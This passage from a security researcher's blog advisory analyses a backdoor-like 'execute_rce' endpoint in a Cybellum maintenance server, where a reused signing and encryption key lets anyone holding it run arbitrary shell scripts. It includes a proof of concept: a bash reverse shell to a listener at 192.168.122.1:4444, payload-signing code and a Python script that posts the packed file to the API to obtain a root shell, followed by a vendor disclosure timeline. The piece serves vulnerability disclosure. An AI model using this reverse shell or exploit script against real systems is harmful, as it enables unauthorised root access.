<figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;<span class="attr">&quot;access_key&quot;</span>:<span class="string">&quot;123&quot;</span>&#125;</span><br></pre></td></tr></table></figure>
<p>Second, in <code>use _upack_file</code> to use  <code>FileSigner.unpack_file</code> validate and decrypt encrypted file.</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">_unpack_file</span>(<span class="params">self, destination, file_name, unpacked_file_name</span>):</span></span><br><span class="line">    file_path = os.path.join(destination, file_name)</span><br><span class="line">    decrypted_file_path = os.path.join(destination, unpacked_file_name)</span><br><span class="line"></span><br><span class="line">    request.files[file_name].save(file_path)</span><br><span class="line"></span><br><span class="line">    <span class="keyword">with</span> <span class="built_in">open</span>(os.path.join(self.SIGN_KEY_HOME, self.PRIVATE_ENCRYPTION_KEY_PASS)) <span class="keyword">as</span> f:</span><br><span class="line">        private_encryption_key_pass = f.read().strip()</span><br><span class="line"></span><br><span class="line">    <span class="keyword">try</span>:</span><br><span class="line">        FileSigner.unpack_file(file_path,</span><br><span class="line">                public_key_path=os.path.join(self.SIGN_KEY_HOME, self.SIGNATURE_PUBLIC_KEY),</span><br><span class="line">                private_encryption_key_path=os.path.join(self.SIGN_KEY_HOME,</span><br><span class="line">                self.ENCRYPTION_PRIVATE_KEY),</span><br><span class="line">                private_encryption_key_pass=private_encryption_key_pass,</span><br><span class="line">                path_to_extract_orig=decrypted_file_path)</span><br><span class="line"></span><br><span class="line">    <span class="keyword">except</span> Exception:</span><br><span class="line">        <span class="keyword">raise</span> Exception(<span class="string">&#x27;Could not unpack file&#x27;</span>)</span><br></pre></td></tr></table></figure>
<p>Third, according to <code>unpack_file</code> , 4 step to unpack file.</p>
<ol>
<li>Read the signature from the unpacked file.</li>
<li>Load the public key <code>signature_public_key.pem</code>, and validate the signature of encrypted file md5.</li>
<li>Read the encrypted key from the unpacked file.</li>
<li>Read the encrypted file and decrypt it with symmetric_key<code>encryption_private_key.pem</code>.</li>
</ol>
<p>A packed file is constructed with three parts; signature segment, encryption parameter segment and encrypted data segment.</p>
<p><img src="image-20240106220903113.png" alt="image-20240106220903113" style="zoom: 60%;" /></p>
<p>Finally, use ExecuteRCETask execute <code>rce_file</code>.</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">ExecuteRCETask</span>(<span class="params">ExecutableTask</span>):</span></span><br><span class="line">    SCRIPT_NAME = <span class="string">&quot;start.sh&quot;</span></span><br><span class="line"></span><br><span class="line">    <span class="function"><span class="keyword">def</span> <span class="title">__init__</span>(<span class="params">self, rce_file_name, *args, **kwargs</span>):</span></span><br><span class="line">        <span class="built_in">super</span>(ExecuteRCETask, self).__init__(*args, **kwargs)</span><br><span class="line">        self.task_type = TaskTypes.EXECUTE_RCE.value</span><br><span class="line">        self.rce_file_name = rce_file_name</span><br><span class="line"></span><br><span class="line">    <span class="function"><span class="keyword">def</span> <span class="title">_execute_specific_task_callback</span>(<span class="params">self, *args, **kwargs</span>):</span></span><br><span class="line">        output_location = self.get_results_location()</span><br><span class="line"></span><br><span class="line">        self.run_subprocess([<span class="string">&quot;unzip&quot;</span>, os.path.join(self.files_root, self.rce_file_name)])</span><br><span class="line">        self.run_subprocess([<span class="string">&quot;sudo&quot;</span>, <span class="string">&quot;chmod&quot;</span>, <span class="string">&quot;777&quot;</span>, <span class="string">&quot;-R&quot;</span>, self.files_root])</span><br><span class="line">        exe_path=os.path.realpath(os.path.join(self.files_root, self.SCRIPT_NAME))</span><br><span class="line">        <span class="keyword">if</span> <span class="keyword">not</span> os.path.exists(exe_path):</span><br><span class="line">            <span class="keyword">raise</span> MissingRceExeFile()</span><br><span class="line">        self.run_subprocess([<span class="string">&quot;bash&quot;</span>,</span><br><span class="line">                             os.path.realpath(os.path.join(self.files_root, self.SCRIPT_NAME)),</span><br><span class="line">                             output_location], preexec_fn=os.setpgrp)</span><br><span class="line"></span><br><span class="line">        <span class="keyword">if</span> <span class="built_in">len</span>(os.listdir(output_location)):</span><br><span class="line">            self.result_downloadable = <span class="literal">True</span></span><br></pre></td></tr></table></figure>
<p>The private key under /mnt/cybellum/maintenance_server/keys directory. </p>
<p><img src="image-20240108125724597.png" alt="image-20240108125724597"></p>
<ul>
<li><strong>encryption_private_key.pem</strong>: signature private key and encryption private key.</li>
<li><strong>private_pass.txt:</strong> private key password.</li>
<li><strong>signature_public_key.pem:</strong> Validate the signature public_key.</li>
</ul>
<p><strong>Key reuse:</strong> signature and encryption use the same key, encryption_private_key.pem deploy to signature, also deploy to encrypt and decrypt file. </p>
<p>Once we get access to the host system, we get a signature and encryption key from the system, so we can write any shell code in start.sh and pack.  The platform consider it legal, and the shell script will be executed. We implemented remote code execution successfully. </p>
<p>If signature and encryption use different keys, and keep the signature’s private key safe. It may be more acceptable only cybellum is able to call <code>execute-rce</code> with the private key.</p>
<h3 id="Proof-of-concept"><a href="#Proof-of-concept" class="headerlink" title="Proof of concept"></a>Proof of concept</h3><ol>
<li><p>prepare reverse shell payload: <code>bash -i &gt;&amp; /dev/tcp/192.168.122.1/4444 0&gt;&amp;1&quot;</code> save to start.sh </p>
</li>
<li><p>compress start.sh to rce.zip</p>
</li>
<li><p>signature and encryption zip file to rce.zip.packed.</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">sign_and_pack_file</span>(<span class="params">destination,file_name,packed_file_name</span>):</span></span><br><span class="line">    file_path = os.path.join(destination, file_name)</span><br><span class="line">    packed_file_path = os.path.join(destination, packed_file_name)</span><br><span class="line">    PRIVATE_ENCRYPTION_KEY_PASS = <span class="string">&quot;maintenance_server/keys/private_pass.txt&quot;</span></span><br><span class="line">    <span class="keyword">with</span> <span class="built_in">open</span>(PRIVATE_ENCRYPTION_KEY_PASS) <span class="keyword">as</span> f:</span><br><span class="line">        private_encryption_key_pass = f.read().strip()</span><br><span class="line"></span><br><span class="line">    FileSigner.sign_and_pack_file(private_key_path=<span class="string">&quot;maintenance_server/keys/encryption_private_key.pem&quot;</span>,private_key_pass=private_encryption_key_pass,input_file=file_path,signed_file_path=packed_file_path,public_encryption_key_path=<span class="string">&quot;maintenance_server/keys/signature_public_key.pem&quot;</span>)</span><br><span class="line">    print(<span class="string">&#x27;The file was signed successfully and was stored at &#123;&#125;&#x27;</span>.<span class="built_in">format</span>(packed_file_path)</span><br></pre></td></tr></table></figure>
</li>
<li><p>POST  payload to <code>/api/execute_rce</code>.</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line">import requests</span><br><span class="line">banner &#x3D; &#39;&#39;&#39;</span><br><span class="line">     ██████╗      ██ ╔██████    ██████╗  █████╗  ██████╗██╗  ██╗██████╗  ██████╗  ██████╗ ██████╗ </span><br><span class="line">    ██╔════╝     ██  ╚════║██    ██╔══██╗██╔══██╗██╔════╝██║ ██╔╝██╔══██╗██╔═══██╗██╔═══██╗██╔══██╗</span><br><span class="line">    ██║         ██        ║██    ██████╔╝███████║██║     █████╔╝ ██║  ██║██║   ██║██║   ██║██████╔╝</span><br><span class="line">    ██║        ██         ║██    ██╔══██╗██╔══██║██║     ██╔═██╗ ██║  ██║██║   ██║██║   ██║██╔══██╗</span><br><span class="line">    ╚██████╗  ██     ╔██████╝    ██████╔╝██║  ██║╚██████╗██║  ██╗██████╔╝╚██████╔╝╚██████╔╝██║  ██║</span><br><span class="line">     ╚═════╝ ██      ╚═════╝    ╚═════╝ ╚═╝  ╚═╝ ╚═════╝╚═╝  ╚═╝╚═════╝  ╚═════╝  ╚═════╝ ╚═╝  ╚═╝</span><br><span class="line"></span><br><span class="line">&#39;&#39;&#39;</span><br><span class="line"></span><br><span class="line">url &#x3D; &quot;http:&#x2F;&#x2F;192.168.1.102:29000&#x2F;api&#x2F;execute_rce&quot;</span><br><span class="line"></span><br><span class="line">files&#x3D;&#123;&#39;rce_file&#39;: open(&#39;E:&#x2F;ing&#x2F;cybellum&#x2F;rce.zip.packed&#39;, &#39;rb&#39;)&#125;</span><br><span class="line">payloads &#x3D; &#123;&quot;access_key&quot;:&quot;123&quot;&#125;</span><br><span class="line">headers &#x3D; &#123;&#39;User-Agent&#39;: &#39;Mozilla&#x2F;5.0 (Windows NT 10.0; Win64; x64) AppleWebKit&#x2F;537.36 (KHTML, like Gecko) Chrome&#x2F;90.0.4430.85 Safari&#x2F;537.36&#39;&#125;</span><br><span class="line">print(banner)</span><br><span class="line">print(&quot;Cybellum Backdoor exploit Program&quot;)</span><br><span class="line"></span><br><span class="line">response &#x3D; requests.request(&quot;POST&quot;, url, data&#x3D;payloads,headers&#x3D;headers, files&#x3D;files)</span><br><span class="line">if &quot;result_downloadable&quot; in response.text:</span><br><span class="line">    print(&quot;Exploit success&quot;)</span><br><span class="line">else:</span><br><span class="line">    print(&quot;Error&quot;)</span><br></pre></td></tr></table></figure>
</li>
<li><p>Get root shell</p>
<p><img src="cybellum_backdoor_exp.gif" alt=""></p>
</li>
</ol>
<h3 id="About-Us"><a href="#About-Us" class="headerlink" title="About Us"></a>About Us</h3><p><a target="_blank" rel="noopener" href="https://twitter.com/delikely">@delikley</a> Security researcher @QAX StarV Security Lab.</p>
<p>@Imweekend Security researcher @XXXX Inspection Institution.</p>
<h3 id="Timeline"><a href="#Timeline" class="headerlink" title="Timeline"></a>Timeline</h3><ul>
<li>2023-06-21 Contacting vendor through Email.</li>
<li>2023-06-26 Cybellum confirmed this issue.</li>
<li>2023-09-13 CVE RESERVED.</li>
<li>2023-10-09 Cybellum release of security advisory.</li>
<li>2024-02-18 release this security advisory.</li>
</ul>
<h3 id="More"><a href="#More" class="headerlink" title="More"></a>More</h3><ul>
<li><a target="_blank" rel="noopener" href="https://cybellum.force.com/CustomerPortal/s/case/5004x00000XjTuS">Cybellum advisories</a></li>
<li><a target="_blank" rel="noopener" href="https://github.com/delikely/advisories/tree/main/Cybellum">Researcher advisories</a></li>
</ul>

  </div>
</article>



    </div>
    
      <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
         
          <li><a href="/">Home</a></li>
         
          <li><a href="/2018/04/11/about/">About</a></li>
         
          <li><a href="/archives/">Writing</a></li>
         
          <li><a target="_blank" rel="noopener" href="https://github.com/delikely">Projects</a></li>
        
      </ul>
    </div>

    <div id="toc-footer" style="display: none">
      <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#Take-a-glance-of-browser-I-find-Cybellum-RCE"><span class="toc-number">1.</span> <span class="toc-text">Take a glance of  browser, I find Cybellum RCE</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#About-Vendor"><span class="toc-number">1.1.</span> <span class="toc-text">About Vendor</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Interesting-status"><span class="toc-number">1.2.</span> <span class="toc-text">Interesting status</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Regcongize-service"><span class="toc-number">1.3.</span> <span class="toc-text">Regcongize service</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Deployment-method"><span class="toc-number">1.4.</span> <span class="toc-text">Deployment method</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Mount-qcow2-disk-image"><span class="toc-number">1.5.</span> <span class="toc-text">Mount qcow2 disk image</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Another-easy-way-to-get-in"><span class="toc-number">1.6.</span> <span class="toc-text">Another easy way to get in</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Analysis-backdoor"><span class="toc-number">1.7.</span> <span class="toc-text">Analysis backdoor</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Proof-of-concept"><span class="toc-number">1.8.</span> <span class="toc-text">Proof of concept</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#About-Us"><span class="toc-number">1.9.</span> <span class="toc-text">About Us</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Timeline"><span class="toc-number">1.10.</span> <span class="toc-text">Timeline</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#More"><span class="toc-number">1.11.</span> <span class="toc-text">More</span></a></li></ol></li></ol>
    </div>

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=http://delikely.github.io/2024/02/18/Cybellum-RCE/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=http://delikely.github.io/2024/02/18/Cybellum-RCE/&text=Take a glance of  browser, I find Cybellum RCE"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=http://delikely.github.io/2024/02/18/Cybellum-RCE/&title=Take a glance of  browser, I find Cybellum RCE"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=http://delikely.github.io/2024/02/18/Cybellum-RCE/&is_video=false&description=Take a glance of  browser, I find Cybellum RCE"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=Take a glance of  browser, I find Cybellum RCE&body=Check out this article: http://delikely.github.io/2024/02/18/Cybellum-RCE/"><i class="fas fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=http://delikely.github.io/2024/02/18/Cybellum-RCE/&title=Take a glance of  browser, I find Cybellum RCE"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=http://delikely.github.io/2024/02/18/Cybellum-RCE/&title=Take a glance of  browser, I find Cybellum RCE"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=http://delikely.github.io/2024/02/18/Cybellum-RCE/&title=Take a glance of  browser, I find Cybellum RCE"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=http://delikely.github.io/2024/02/18/Cybellum-RCE/&title=Take a glance of  browser, I find Cybellum RCE"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=http://delikely.github.io/2024/02/18/Cybellum-RCE/&name=Take a glance of  browser, I find Cybellum RCE&description="><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=http://delikely.github.io/2024/02/18/Cybellum-RCE/&text=Take a glance of  browser, I find Cybellum RCE"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fas fa-bars fa-lg" aria-hidden="true"></i> Menu</a>
        <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fas fa-list fa-lg" aria-hidden="true"></i> TOC</a>
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fas fa-share-alt fa-lg" aria-hidden="true"></i> Share</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up fa-lg" aria-hidden="true"></i> Top</a>
    </div>

  </div>
</div>

    
    <footer id="footer">
  <div class="footer-left">
    Copyright &copy; 2024 Delikely
  </div>
  <div class="footer-right">
    <nav>
      <ul>
         
          <li><a href="/">Home</a></li>
         
          <li><a href="/2018/04/11/about/">About</a></li>
         
          <li><a href="/archives/">Writing</a></li>
         
          <li><a target="_blank" rel="noopener" href="https://github.com/delikely">Projects</a></li>
        
      </ul>
    </nav>
  </div>
</footer><!-- hexo-inject:begin --><!-- Begin: Injected MathJax -->
<script type="text/x-mathjax-config">
  MathJax.Hub.Config({{ JSON.stringify(config) }});
</script>

<script type="text/x-mathjax-config">
  MathJax.Hub.Queue(function() {
    var all = MathJax.Hub.getAllJax(), i;
    for(i=0; i < all.length; i += 1) {
      all[i].SourceElement().parentNode.className += ' has-jax';
    }
  });
</script>

<script type="text/javascript" src="{{ src }}">
</script>
<!-- End: Injected MathJax -->
<!-- hexo-inject:end -->

</body>
</html>
<!-- styles -->

<link rel="stylesheet" href="/lib/font-awesome/css/fontawesome-all.min.css">


<link rel="stylesheet" href="/lib/justified-gallery/css/justifiedGallery.min.css">


<!-- jquery -->

<script src="/lib/jquery/jquery.min.js"></script>


<script src="/lib/justified-gallery/js/jquery.justifiedGallery.min.js"></script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Google Analytics -->

    <script type="text/javascript">
        (function(i,s,o,g,r,a,m) {i['GoogleAnalyticsObject']=r;i[r]=i[r]||function() {
        (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
        m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
        })(window,document,'script','//www.google-analytics.com/analytics.js','ga');
        ga('create', 'G-KX5LMFBRGG', 'auto');
        ga('send', 'pageview');
    </script>

<!-- Baidu Analytics -->

    <script type="text/javascript">
        var _hmt = _hmt || [];
        (function() {
            var hm = document.createElement("script");
            hm.src = "https://hm.baidu.com/hm.js?4c5298163cee69d0e09ddc06ab1b8104";
            var s = document.getElementsByTagName("script")[0];
            s.parentNode.insertBefore(hm, s);
        })();
    </script>

<!-- Disqus Comments -->


